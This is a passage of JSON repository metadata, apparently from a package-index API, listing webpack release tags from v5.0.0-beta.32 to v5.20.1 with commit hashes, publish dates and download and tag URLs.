01bc39a88b4","kind":"tag","published_at":"2021-02-03T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1/manifests"},{"name":"v5.20.0","sha":"181e045499c44c9855da56ce38ee5fecbe2998d2","kind":"tag","published_at":"2021-02-02T20:21:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0/manifests"},{"name":"v5.19.0","sha":"3f7573c83ce53a486eff1439ba6fa9143ddbbf0b","kind":"tag","published_at":"2021-01-29T19:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0/manifests"},{"name":"v5.18.0","sha":"16774961d4f9371251c96adf98618675eb032f30","kind":"tag","published_at":"2021-01-26T19:52:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0/manifests"},{"name":"v5.17.0","sha":"d02e8daa267ca094fc0a030a595b000d35a99493","kind":"tag","published_at":"2021-01-22T14:01:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0/manifests"},{"name":"v5.16.0","sha":"56246f0833333a8e277386b16408d8a3eeff553e","kind":"tag","published_at":"2021-01-19T18:39:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0/manifests"},{"name":"v5.15.0","sha":"0a8bf41f169c53c0819f0f320db5957017ac58de","kind":"tag","published_at":"2021-01-15T15:53:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0/manifests"},{"name":"v5.14.0","sha":"f87cafe91c251863cc3dc84ce81b60445f2a780d","kind":"tag","published_at":"2021-01-13T23:52:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0/manifests"},{"name":"v5.13.0","sha":"a694cdfb82b5fd0a5c52102083a267a36446e03e","kind":"tag","published_at":"2021-01-11T22:30:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0/manifests"},{"name":"v4.46.0","sha":"444e59f8a427f94f0064cae6765e5a3c4b78596d","kind":"tag","published_at":"2021-01-11T13:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0/manifests"},{"name":"v5.12.3","sha":"a064b0ff3315db0d95124aaf5cc9b0a6add82926","kind":"tag","published_at":"2021-01-10T18:23:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3/manifests"},{"name":"v5.12.2","sha":"88610d738ff78fa3fb7f859ee284c632bca42a24","kind":"tag","published_at":"2021-01-09T08:27:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2/manifests"},{"name":"v5.12.1","sha":"62ec1546260d168cffd5dec8fc397c6e1159e4e4","kind":"tag","published_at":"2021-01-08T15:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1/manifests"},{"name":"v5.12.0","sha":"74c9c72b873b27ec552cd6b85a9b578d6698e102","kind":"tag","published_at":"2021-01-08T12:58:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0/manifests"},{"name":"v4.45.0","sha":"03313223fd4a0d4e570b8c79971e61b28cb3aeae","kind":"tag","published_at":"2021-01-08T12:53:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0/manifests"},{"name":"v5.11.1","sha":"98bcf44a43d0109ac2680487fddf3c3262395e1f","kind":"tag","published_at":"2020-12-28T18:06:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1/manifests"},{"name":"v5.11.0","sha":"f04328bad933fd9bacea389df17db96ffbd2336b","kind":"tag","published_at":"2020-12-17T15:59:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0/manifests"},{"name":"v5.10.3","sha":"10ad4e95b850bbe20019275fd1d364666c4b69ea","kind":"tag","published_at":"2020-12-15T20:00:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3/manifests"},{"name":"v5.10.2","sha":"c937292e6fb2e1e0a618d9d633f4184ec64cda75","kind":"tag","published_at":"2020-12-15T08:08:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2/manifests"},{"name":"v5.10.1","sha":"3f3d0138f9c18658be87d89d609fc7c6d286005f","kind":"tag","published_at":"2020-12-11T20:32:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1/manifests"},{"name":"v5.10.0","sha":"06e1cce1221ca717fc8efbaeca5ca71246f85a44","kind":"tag","published_at":"2020-12-04T19:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0/manifests"},{"name":"v5.9.0","sha":"0e7437dc3042874649919d4ffe005db13053c4ff","kind":"tag","published_at":"2020-11-28T21:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0/manifests"},{"name":"v5.8.0","sha":"fb7d09b315bbf3b5388eed0cc5e58309187a3acc","kind":"tag","published_at":"2020-11-26T17:58:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0/manifests"},{"name":"v5.7.0","sha":"4ba6d2ea67e9046cbba83f588989b3cadff7d911","kind":"tag","published_at":"2020-11-26T06:08:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0/manifests"},{"name":"v5.6.0","sha":"1936615458352f38ff517d258b936d690a7b631f","kind":"tag","published_at":"2020-11-19T12:18:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0/manifests"},{"name":"v5.5.1","sha":"a6ebce41059a029163a1774b35d81e0bfaa05b27","kind":"tag","published_at":"2020-11-18T12:39:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1/manifests"},{"name":"v5.5.0","sha":"3471c776059ac2d26593ea39f9c47c1874253dbb","kind":"tag","published_at":"2020-11-17T13:23:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0/manifests"},{"name":"v5.4.0","sha":"84dafd164499b6080243cf9d00537b47b6e075c2","kind":"tag","published_at":"2020-11-03T15:28:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0/manifests"},{"name":"v5.3.2","sha":"3df96f4a7843ef07794c31da8c7469dff133a228","kind":"tag","published_at":"2020-10-29T19:52:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2/manifests"},{"name":"v5.3.1","sha":"dfae6f0ac70e1f4ec6d25a853838d4aa58e10e1f","kind":"tag","published_at":"2020-10-28T21:07:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1/manifests"},{"name":"v5.3.0","sha":"ab555844701209492debf23cc3168a0efafb3251","kind":"tag","published_at":"2020-10-27T11:52:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0/manifests"},{"name":"v5.2.1","sha":"d09357b4008da750e0d90066b2cd9567edc27a61","kind":"tag","published_at":"2020-10-27T11:02:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1/manifests"},{"name":"v5.2.0","sha":"d42705c05dd62d562b759fb518f86c9854435df4","kind":"tag","published_at":"2020-10-22T16:59:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0/manifests"},{"name":"v5.1.3","sha":"c90dfadbc6c5ac1ab4bda2cc106958b65fb5e6e7","kind":"tag","published_at":"2020-10-16T13:36:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3/manifests"},{"name":"v5.1.2","sha":"83790375529c5b2967d45ed40700399e107d478f","kind":"tag","published_at":"2020-10-15T18:41:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2/manifests"},{"name":"v5.1.1","sha":"f2f998b58362d5edc9945a48f8245a3347ad007c","kind":"tag","published_at":"2020-10-15T13:08:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1/manifests"},{"name":"v5.1.0","sha":"77329b4d0e1aa35e26d8a32b2a8968a824b5de9c","kind":"tag","published_at":"2020-10-13T12:37:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0/manifests"},{"name":"v5.0.0","sha":"610f36817af1f1c6929786d68f734ac582af1757","kind":"tag","published_at":"2020-10-10T20:07:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0/manifests"},{"name":"v5.0.0-rc.6","sha":"75ecff262ef0c1953e0d13c0b6a06bdad7ccace5","kind":"tag","published_at":"2020-10-10T19:03:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6/manifests"},{"name":"v5.0.0-rc.5","sha":"57b493f6ff0bd55dddfbfc7ffc2f2680a7f82a6d","kind":"tag","published_at":"2020-10-09T22:38:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5/manifests"},{"name":"v5.0.0-rc.4","sha":"1755fe30224943bca80e14634b4cf3f876e529ef","kind":"tag","published_at":"2020-10-07T08:49:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4/manifests"},{"name":"v5.0.0-rc.3","sha":"ef38f322a963034271b76258beed35239760f526","kind":"tag","published_at":"2020-09-30T08:48:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3/manifests"},{"name":"v5.0.0-rc.2","sha":"d49b49ddebc6c06703e19ff6391915d2b09b0f2b","kind":"tag","published_at":"2020-09-29T18:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2/manifests"},{"name":"v5.0.0-rc.1","sha":"f60db1a079c7df48400637c54c547c161ed189da","kind":"tag","published_at":"2020-09-28T19:18:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1/manifests"},{"name":"v5.0.0-rc.0","sha":"658209c253287de9edee85293d23123d5183a873","kind":"tag","published_at":"2020-09-20T21:11:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0/manifests"},{"name":"v5.0.0-beta.33","sha":"dd3ec4f8072605479410ee7c13cb7a12688939d1","kind":"tag","published_at":"2020-09-20T21:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.33","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.33","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.33","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33/manifests"},{"name":"v5.0.0-beta.32","sha":"e81882adb2ca1a3cceb3dc28d4f73c09f013eb83","kind":"tag","published_at":"2020-09-18T18:08:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32","manifests_url":"https://repo